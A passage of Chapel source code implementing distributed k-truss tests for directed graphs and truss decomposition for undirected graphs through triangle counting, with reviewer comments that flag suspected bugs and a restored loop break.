} //end coforall loc in Locales
tmpN2+=1;
SetNextF.clear();
}// end of while (!SetCurF.isEmpty())
N2+=1;
}// end while
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge {
if (lEdgeDeleted[i]==1-k) {
lEdgeDeleted[i] = k-1;
}
}
}// end of on loc
} // end of coforall loc in Locales
var tmpi=0;
while tmpi<Ne {
if (lEdgeDeleted[tmpi]==-1) {
return false;
} else {
tmpi+=1;
}
}
return true;
} // end of proc SKMaxTrussMix
//For Directed graph
// Naive max-k-truss test for a DIRECTED graph: repeatedly (1) recount the
// triangles supported by every surviving edge, then (2) delete every edge
// supporting fewer than k-2 triangles, until no more edges are deleted.
// Returns true when ALL edges end up deleted (i.e. no k-truss survives),
// false as soon as one surviving edge is found.
// CSR-style inputs: nei[v] = out-degree, start_i[v] = first edge index of v,
// src/dst = edge endpoint arrays.
proc SkMaxTrussNaiveDirected(k:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int):bool throws{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N2=0:int;
var ConFlag=true:bool;
// NOTE(review): this proc initializes the global EdgeDeleted, yet the loops
// below test and set lEdgeDeleted — verify these are meant to be the same
// array (the sibling undirected variant uses lEdgeDeleted throughout).
EdgeDeleted=-1;
var RemovedEdge=0: int;
var TriCount=makeDistArray(Ne,atomic int);
// EReverse[e3] collects (i,e) edge pairs that form a triangle with e3, so a
// later deletion of e3 can find its co-triangle edges without re-searching.
var EReverse=makeDistArray(Ne,set((int,int),parSafe = true) );
forall i in TriCount {
i.write(0);
}
var timer:Timer;
// Mark edge `cur` as deleted (EdgeDeleted[cur]=k-1) if an identical edge
// appears earlier in u's segment, or as <v,u> when u>v. Returns the
// duplicate's edge ID, or -1 if `cur` is unique. cur==0 can never be a
// duplicate (nothing precedes it), so it is rejected up front.
proc RemoveDuplicatedEdges( cur: int):int {
if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
// Search for an earlier copy of <u,v> inside u's own segment [lu, cur-1].
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
// Only when u>v can the mirror edge <v,u> precede <u,v> in edge order.
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// Given vertices u and v, return the edge ID e=<u,v> or e=<v,u>
// (tries both orientations); -1 for self-loops/out-of-domain/missing.
proc findEdge(u:int,v:int):int {
// Given the destination array dst and the edge range [l,h], return the edge ID e where dst[e]==key.
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirected edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirected edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
// Given vertices u and v, return the edge ID e=<u,v> (exact orientation only).
proc exactEdge(u:int,v:int):int {
// Given the destination array dst and the edge range [l,h], return the edge ID e where dst[e]==key.
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirected edges
}
}
return eid;
}// end of proc exactEdge(u:int,v:int)
//here we begin the first naive version
// NOTE(review): timer is started (and stopped at the end) but elapsed() is
// never logged in this proc — confirm whether timing output was intended.
timer.start();
//we will try to remove all the unnecessary edges in the graph
while (ConFlag) {
//ConFlag=false;
// first we calculate the number of triangles
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// Full recount each round: reset all locally-owned counters first.
forall i in startEdge..endEdge {
TriCount[i].write(0);
}
//forall i in startEdge..endEdge with(ref SetCurF){
forall i in startEdge..endEdge {
var u = src[i];
var v = dst[i];
var du=nei[u];
var dv=nei[v];
{
var beginTmp=start_i[u];
var endTmp=beginTmp+nei[u]-1;
if ((lEdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[u]>1) ){
//forall x in dst[beginTmp..endTmp] with (ref uadj) {
// Case 1: triangle via u's other out-neighbors x — edges i=<u,v>,
// e=<u,x>, e3 between x and v. i<e dedups counting the same triangle.
forall x in dst[beginTmp..endTmp] {
var e=findEdge(u,x);//here we find the edge ID to check if it has been removed
if (e==-1){
} else {
if ((lEdgeDeleted[e] ==-1) && (x !=v) && (i<e)) {
var e3=findEdge(x,v);
if (e3!=-1) {
if (lEdgeDeleted[e3]==-1) {
TriCount[i].add(1);
TriCount[e].add(1);
TriCount[e3].add(1);
EReverse[e3].add((i,e));
}
}
}
}
}
}
}
beginTmp=start_i[v];
endTmp=beginTmp+nei[v]-1;
if ((lEdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[v]>0) ){
//forall x in dst[beginTmp..endTmp] with (ref vadj) {
// Case 2: triangle via v's out-neighbors x — edges i=<u,v>, e=<v,x>,
// and a closing edge back to u.
forall x in dst[beginTmp..endTmp] {
var e=findEdge(v,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",v," findEdge Error self-loop or no such edge");
} else {
if ((lEdgeDeleted[e] ==-1) && (x !=u) && (i<e)) {
// NOTE(review): this searches findEdge(x,v) but then requires
// src[e3]==x && dst[e3]==u — the closing edge should connect x
// and u, so findEdge(x,u) looks intended. Verify.
var e3=findEdge(x,v);
if (e3!=-1) {
if ((lEdgeDeleted[e3]==-1) && (src[e3]==x) && (dst[e3]==u) && (i<e3)) {
TriCount[i].add(1);
TriCount[e].add(1);
TriCount[e3].add(1);
}
}
}
}
}
}
}
}// end of if du<=dv
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
// Delete every surviving edge whose support dropped below k-2; the bag is
// only used here to detect whether anything was removed this round.
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((lEdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
lEdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
ConFlag=false;
if SetCurF.getSize()>0 {
ConFlag=true;
}
SetCurF.clear();
N2+=1;
}// end while
timer.stop();
// A k-truss survives iff some edge is still undeleted.
var tmpi=0;
while tmpi<Ne {
if (lEdgeDeleted[tmpi]==-1) {
return false;
} else {
tmpi+=1;
}
}
return true;
} // end of proc SkMaxTrussNaiveDirected
//For directed graph
// Frontier-based max-k-truss test for a DIRECTED graph. Like the naive
// variant it recounts triangles per round, but after the bulk deletion it
// propagates removals through an edge frontier (SetCurF -> SetNextF) so
// only affected edges are re-examined. Returns true when all edges are
// deleted (no k-truss), false if any edge survives.
proc SkMaxTrussDirected(k:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int):bool throws{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N2=0:int;
var ConFlag=true:bool;
// NOTE(review): initializes global EdgeDeleted but the loops below test and
// set lEdgeDeleted — verify these refer to the same array.
EdgeDeleted=-1;
var RemovedEdge=0: int;
var TriCount=makeDistArray(Ne,atomic int);
// EReverse[e3] records (i,e) pairs forming a triangle with e3 so deleting
// e3 later can decrement its co-triangle edges without re-searching.
var EReverse=makeDistArray(Ne,set((int,int),parSafe = true) );
forall i in TriCount {
i.write(0);
}
var timer:Timer;
// Mark edge `cur` deleted if an identical earlier copy (or <v,u> with u>v)
// exists; return the duplicate's ID or -1. Edge 0 can never be a duplicate.
proc RemoveDuplicatedEdges( cur: int):int {
if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// Given vertices u and v, return the edge ID e=<u,v> or e=<v,u>
// (tries both orientations); -1 for self-loops/out-of-domain/missing.
proc findEdge(u:int,v:int):int {
// Given the destination array dst and the edge range [l,h], return the edge ID e where dst[e]==key.
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirected edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirected edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
// Given vertices u and v, return the edge ID e=<u,v> (exact orientation only).
proc exactEdge(u:int,v:int):int {
// Given the destination array dst and the edge range [l,h], return the edge ID e where dst[e]==key.
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirected edges
}
}
return eid;
}// end of proc exactEdge(u:int,v:int)
//here we begin the first naive version
timer.start();
//we will try to remove all the unnecessary edges in the graph
while (ConFlag) {
//ConFlag=false;
// first we calculate the number of triangles
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// Full recount each round: reset locally-owned counters first.
forall i in startEdge..endEdge {
TriCount[i].write(0);
}
//forall i in startEdge..endEdge with(ref SetCurF){
forall i in startEdge..endEdge {
var u = src[i];
var v = dst[i];
var du=nei[u];
var dv=nei[v];
{
var beginTmp=start_i[u];
var endTmp=beginTmp+nei[u]-1;
if ((lEdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[u]>1) ){
//forall x in dst[beginTmp..endTmp] with (ref uadj) {
// Case 1: triangle via u's other out-neighbors x — edges i=<u,v>,
// e=<u,x>, e3 between x and v. i<e dedups the same triangle.
forall x in dst[beginTmp..endTmp] {
var e=findEdge(u,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((lEdgeDeleted[e] ==-1) && (x !=v) && (i<e)) {
var e3=findEdge(x,v);
if (e3!=-1) {
if (lEdgeDeleted[e3]==-1) {
TriCount[i].add(1);
TriCount[e].add(1);
TriCount[e3].add(1);
EReverse[e3].add((i,e));
}
}
}
}
}
}
}
beginTmp=start_i[v];
endTmp=beginTmp+nei[v]-1;
if ((lEdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[v]>0) ){
//forall x in dst[beginTmp..endTmp] with (ref vadj) {
// Case 2: triangle via v's out-neighbors x.
forall x in dst[beginTmp..endTmp] {
var e=findEdge(v,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",v," findEdge Error self-loop or no such edge");
} else {
if ((lEdgeDeleted[e] ==-1) && (x !=u) && (i<e)) {
// NOTE(review): searches findEdge(x,v) but then requires
// src[e3]==x && dst[e3]==u — the closing edge connects x and u,
// so findEdge(x,u) looks intended. Verify (same pattern appears
// in SkMaxTrussNaiveDirected).
var e3=findEdge(x,v);
if (e3!=-1) {
if ((lEdgeDeleted[e3]==-1) && (src[e3]==x) && (dst[e3]==u) && (i<e3)) {
TriCount[i].add(1);
TriCount[e].add(1);
TriCount[e3].add(1);
}
}
}
}
}
}
}
}// end of if du<=dv
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
// NOTE(review): this coforall's inner forall has an empty body — the whole
// construct is a no-op and is presumably leftover scaffolding; candidate
// for removal.
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge with(ref SetCurF){
}
}// end of on loc
} // end of coforall loc in Locales
// Seed the deletion frontier with every edge whose support is below k-2.
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((lEdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
lEdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
ConFlag=false;
// we try to remove as many edges as possible in the following code
var tmpN2=0:int;
// Frontier propagation: for each freshly-deleted edge i=<v1,v2>, decrement
// the triangle counts of its co-triangle edges and queue any that fall
// below k-2 into SetNextF as (cause, victim) pairs.
while (SetCurF.getSize()>0) {
//first we build the edge set that will be affected by the removed edges in SetCurF
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF with (ref SetNextF) {
if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
var v1=src[i];
var v2=dst[i];
var dv1=nei[v1];
var dv2=nei[v2];
{
var nextStart=start_i[v1];
var nextEnd=start_i[v1]+nei[v1]-1;
// Triangles through v1's other out-edges j=<v1,v4> and a third
// edge between v2 and v4.
if (nei[v1]>1) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==v1
var v4=dst[j];
var tmpe:int;
if ( (lEdgeDeleted[j]<=-1) && ( v2!=v4 ) ) {
tmpe=findEdge(v2,v4);
if (tmpe!=-1) {// there is such third edge
if ( lEdgeDeleted[tmpe]<=-1 ) {
if ((lEdgeDeleted[j]==-1) && (lEdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
// Exactly one of j/tmpe is already in this round's frontier:
// only the still-live edge loses a triangle; the i<j tie-break
// avoids double-decrementing from both deleted endpoints.
//if ((lEdgeDeleted[j]==-1) && (i<tmpe)) {
if ((lEdgeDeleted[j]==-1) ) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((lEdgeDeleted[tmpe]==-1) &&(i<j)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read()<k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}// end of if EdgeDeleted[j]<=-1
}// end of forall j in nextStart..nextEnd
}// end of if nei[v1]>1
nextStart=start_i[v2];
nextEnd=start_i[v2]+nei[v2]-1;
// Cycle triangles v1->v2->v4->v1 through v2's out-edges.
if (nei[v2]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==v2
var v4=dst[j];
var tmpe:int;
if ( (lEdgeDeleted[j]<=-1) && ( v1!=v4 ) ) {
tmpe=exactEdge(v4,v1);
if (tmpe!=-1) {// there is such third edge
if ( lEdgeDeleted[tmpe]<=-1 ) {
if ((lEdgeDeleted[j]==-1) && (lEdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((lEdgeDeleted[j]==-1) && (i<tmpe) ) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((lEdgeDeleted[tmpe]==-1) && (i<j) ) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}
}// end of forall j in nextStart..nextEnd
}// end of if
// Triangles recorded during counting where i was the closing edge e3.
if EReverse[i].size>0 {
forall (e1,e2) in EReverse[i] {
if ((lEdgeDeleted[e1]==-1) && (lEdgeDeleted[e2]==-1)) {
TriCount[e1].sub(1);
if TriCount[e1].read() <k-2 {
SetNextF.add((i,e1));
}
TriCount[e2].sub(1);
if TriCount[e2].read() <k-2 {
SetNextF.add((i,e2));
}
}
}
}
}
} // end if (xlocal(i,startEdge,endEdge)
} // end forall i in SetCurF with (ref SetNextF)
} //end on loc
} //end coforall loc in Locales
// Finalize this round's frontier: flip the provisional 1-k marker to k-1.
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF {
if (xlocal(i,startEdge,endEdge) && (lEdgeDeleted[i]==1-k)) {//each local only check the owned edges
lEdgeDeleted[i]=k-1;
}
}
}
}
SetCurF.clear();
// Promote next-frontier victims to the current frontier.
// NOTE(review): unlike the Mix variant, victims here are deleted directly
// without the rset de-duplication / re-check pass — confirm duplicates in
// SetNextF cannot over-delete.
coforall loc in Locales with (ref SetNextF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
var rset = new set((int,int), parSafe = true);
forall (i,j) in SetNextF with(ref rset) {
if (xlocal(j,startEdge,endEdge)) {//each local only check the owned edges
lEdgeDeleted[j]=1-k;
SetCurF.add(j);
// rset.add((i,j));// just want (i,j) is unique in rset
}
}// end of forall
}
}
SetNextF.clear();
tmpN2+=1;
}// end of while
N2+=1;
}// end while
timer.stop();
// A k-truss survives iff some edge is still undeleted.
var tmpi=0;
while tmpi<Ne {
if (lEdgeDeleted[tmpi]==-1) {
return false;
} else {
tmpi+=1;
}
}
return true;
} // end of proc SkMaxTrussDirected
//End of Max KTruss Serial
//For undirected graph, using the naive method
// Truss decomposition for an UNDIRECTED graph (forward arrays nei/start_i/
// src/dst plus reversed arrays neiR/start_iR/srcR/dstR) using path-merge
// triangle counting: for each edge <u,v> the four sorted adjacency segments
// (u-forward/backward x v-forward/backward) are merged pairwise to count
// common neighbors. Starting from kvalue, edges with support < k-2 are
// peeled; when a round removes nothing but undeleted edges remain, k is
// incremented, so on exit k-1 is the maximum truss number. Stores the
// per-edge deletion labels in the symbol table and returns its attrib string.
//
// FIX: the termination scan previously had its `break` commented out, so
// finding an undeleted edge set ConFlag=true without ever advancing tmpi —
// an infinite loop. The break is restored below.
proc TrussDecompositionNaivePathMerge(kvalue:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] int):string throws {
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N1=0:int;
var N2=0:int;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge=0: int;
var k=kvalue:int;
var timer:Timer;
// Index of the first edge surviving the final round; Ne-largest is reported
// as the size of the largest k-truss.
var largest:int;
largest=Ne;
// Mark edge `cur` deleted if an identical earlier copy (or <v,u> with u>v)
// exists; return the duplicate's ID or -1. Edge 0 can never be a duplicate.
proc RemoveDuplicatedEdges( cur: int):int {
//if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
if ( (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// Given vertices u and v, return the edge ID e=<u,v> or e=<v,u>
// (tries both orientations); -1 for self-loops/out-of-domain/missing.
proc findEdge(u:int,v:int):int {
// Given the destination array dst and the edge range [l,h], return the edge ID e where dst[e]==key.
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirected edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirected edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
//here we begin the first naive version
//coforall loc in Locales {
// on loc {
// Preprocessing (serial over all edges): drop self-loops, edges incident to
// vertices with total degree < k-1, and duplicated edges.
{
{
//var ld = src.localSubdomain();
//var startEdge = ld.low;
//var endEdge = ld.high;
var startEdge = 0;
var endEdge = Ne-1;
forall i in startEdge..endEdge {
var v1=src[i];
var v2=dst[i];
if ( (nei[v1]+neiR[v1])<k-1 ||
((nei[v2]+neiR[v2])<k-1) || (v1==v2)) {
//we will delete all the edges connected with a vertex only has very small degree
//(less than k-1)
EdgeDeleted[i]=k-1;
// we can safely delete the edge <u,v> if the degree of u or v is less than k-1
// we also remove the self-loop like <v,v>
if (v1==v2) {
//writeln("My locale=",here.id," Find self-loop ",i,"=<",src[i],",",dst[i],">");
}
}
if (EdgeDeleted[i]==-1) {
var DupE= RemoveDuplicatedEdges(i);
if (DupE!=-1) {
//we find duplicated edge
}
}
}
}
}// end of coforall loc
//writeln("After Preprocessing");
timer.start();
while (ConFlag) {
// first we calculate the number of triangles
coforall loc in Locales {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge {
TriCount[i]=0;
var u = src[i];
var v = dst[i];
var beginUf=start_i[u];
var endUf=beginUf+nei[u]-1;
var beginUb=start_iR[u];
var endUb=beginUb+neiR[u]-1;
var beginVf=start_i[v];
var endVf=beginVf+nei[v]-1;
var beginVb=start_iR[v];
var endVb=beginVb+neiR[v]-1;
var iu:int;
var jv:int;
var eu:int;
var ev:int;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
// Merge 1: u-forward x v-forward. Segments are walked in lockstep;
// deleted edges and the endpoints u/v themselves are skipped.
iu=beginUf;
jv=beginVf;
//writeln("Enter while 1 in iteration ",N2 , " and edge=", i);
while ( (iu <=endUf) && (jv<=endVf)) {
if ( (EdgeDeleted[iu] !=-1) || (dst[iu]==v) ) {
iu+=1;
continue;
}
if ( (EdgeDeleted[jv]!=-1) || (dst[jv]==u) ) {
jv+=1;
continue;
}
//if ( (dst[jv]!=u) && (dst[iu]!=v) && ( EdgeDeleted[iu] ==-1) && (EdgeDeleted[jv]==-1) ) {
{
if dst[iu]==dst[jv] {
TriCount[i]+=1;
iu+=1;
jv+=1;
} else {
if dst[iu]<dst[jv] {
iu+=1;
} else {
jv+=1;
}
}
}
}
// Merge 2: u-forward x v-backward (reverse edges are mapped back to
// their forward edge ID via findEdge to test deletion).
iu=beginUf;
jv=beginVb;
//writeln("Enter while 2 in iteration ",N2 , " and edge=", i);
while ( (iu <=endUf) && (jv<=endVb)) {
if ( (EdgeDeleted[iu] !=-1) || (dst[iu]==v) ) {
iu+=1;
continue;
}
ev=findEdge(dstR[jv],v);
if ( (EdgeDeleted[ev]!=-1) || (dstR[jv]==u) ) {
jv+=1;
continue;
}
//if ( (dstR[jv]!=u) && (dst[iu]!=v) && ( EdgeDeleted[iu] ==-1) && (EdgeDeleted[ev]==-1) ) {
{
if dst[iu]==dstR[jv] {
TriCount[i]+=1;
iu+=1;
jv+=1;
} else {
if dst[iu]<dstR[jv] {
iu+=1;
} else {
jv+=1;
}
}
}
}
// Merge 3: u-backward x v-forward.
iu=beginUb;
jv=beginVf;
//writeln("Enter while 3 in iteration ",N2 , " and edge=", i);
while ( (iu <=endUb) && (jv<=endVf)) {
eu=findEdge(dstR[iu],u);
if ( (EdgeDeleted[eu] !=-1) || (dstR[iu]==v) ) {
iu+=1;
continue;
}
if ( (EdgeDeleted[jv]!=-1) || (dst[jv]==u) ) {
jv+=1;
continue;
}
//if ( (dst[jv]!=u) && (dstR[iu]!=v) && ( EdgeDeleted[eu] ==-1) && (EdgeDeleted[jv]==-1) ) {
{
if dstR[iu]==dst[jv] {
TriCount[i]+=1;
iu+=1;
jv+=1;
} else {
if dstR[iu]<dst[jv] {
iu+=1;
} else {
jv+=1;
}
}
}
}
// Merge 4: u-backward x v-backward.
iu=beginUb;
jv=beginVb;
//writeln("Enter while 4 in iteration ",N2 , " and edge=", i);
while ( (iu <=endUb) && (jv<=endVb)) {
eu=findEdge(dstR[iu],u);
ev=findEdge(dstR[jv],v);
if ( (EdgeDeleted[eu] !=-1) || (dstR[iu]==v) ) {
iu+=1;
continue;
}
if ( (EdgeDeleted[ev]!=-1) || (dstR[jv]==u) ) {
jv+=1;
continue;
}
//if ( (dstR[jv]!=u) && (dstR[iu]!=v) && ( EdgeDeleted[eu] ==-1) && (EdgeDeleted[ev]==-1) ) {
{
if dstR[iu]==dstR[jv] {
TriCount[i]+=1;
iu+=1;
jv+=1;
} else {
if dstR[iu]<dstR[jv] {
iu+=1;
} else {
jv+=1;
}
}
}
}
}//end of if
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
SetCurF.clear();
// Peel every surviving edge with support below k-2.
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i] < k-2)) {
EdgeDeleted[i] = k-1;
SetCurF.add(i);
//writeln("Remove edge ",i, " in iteration ", N2);
}
}
}// end of on loc
} // end of coforall loc in Locales
if ( SetCurF.getSize()<=0){
ConFlag=false;
} else {
ConFlag=true;
}
SetCurF.clear();
var tmpi=0;
// Nothing removed this round: if any edge survives, raise k and continue;
// otherwise the decomposition is finished.
if (ConFlag==false) {
while tmpi<Ne {
if (EdgeDeleted[tmpi]==-1) {
ConFlag=true;
//k=k+1;
break; // BUGFIX: restored — without it tmpi never advances and this loop never terminates
} else {
tmpi+=1;
}
}
if (ConFlag) {
k+=1;
}
if (tmpi>0) {
largest=tmpi;
}
}
N2+=1;
}// end while
timer.stop();
outMsg="After Truss Naive Decomposition Path Merge, Max K ="+(k-1):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After Truss Naive Decomposition Path Merge,Total execution time="+(timer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After Truss Naive Decomposition Path Merge,Total number of iterations ="+N2:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After Truss Naive Decomposition Path Merge,The largest k-truss edges="+(Ne-largest):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
AllRemoved=true;
// Publish the per-edge deletion labels through the symbol table.
var countName = st.nextName();
var countEntry = new shared SymEntry(EdgeDeleted);
st.addEntry(countName, countEntry);
var cntMsg = 'created ' + st.attrib(countName);
return cntMsg;
} // end of proc TrussDecompositionNaivePathMerge
//For undirected graph, use list intersection method just for the initial triangle couting.
// Truss decomposition for an UNDIRECTED graph using list intersection for
// triangle counting: for each edge <u,v> the full (forward + reverse)
// neighbor sets of u and v are materialized as parallel-safe sets and their
// intersection size is the edge's support. Peeling and k-escalation logic
// mirrors TrussDecompositionNaivePathMerge. Stores the per-edge deletion
// labels in the symbol table and returns its attrib string.
//
// FIX: the termination scan previously had no `break`, so finding an
// undeleted edge set ConFlag=true without advancing tmpi — an infinite
// loop. The break is restored below (same fix as the path-merge variant).
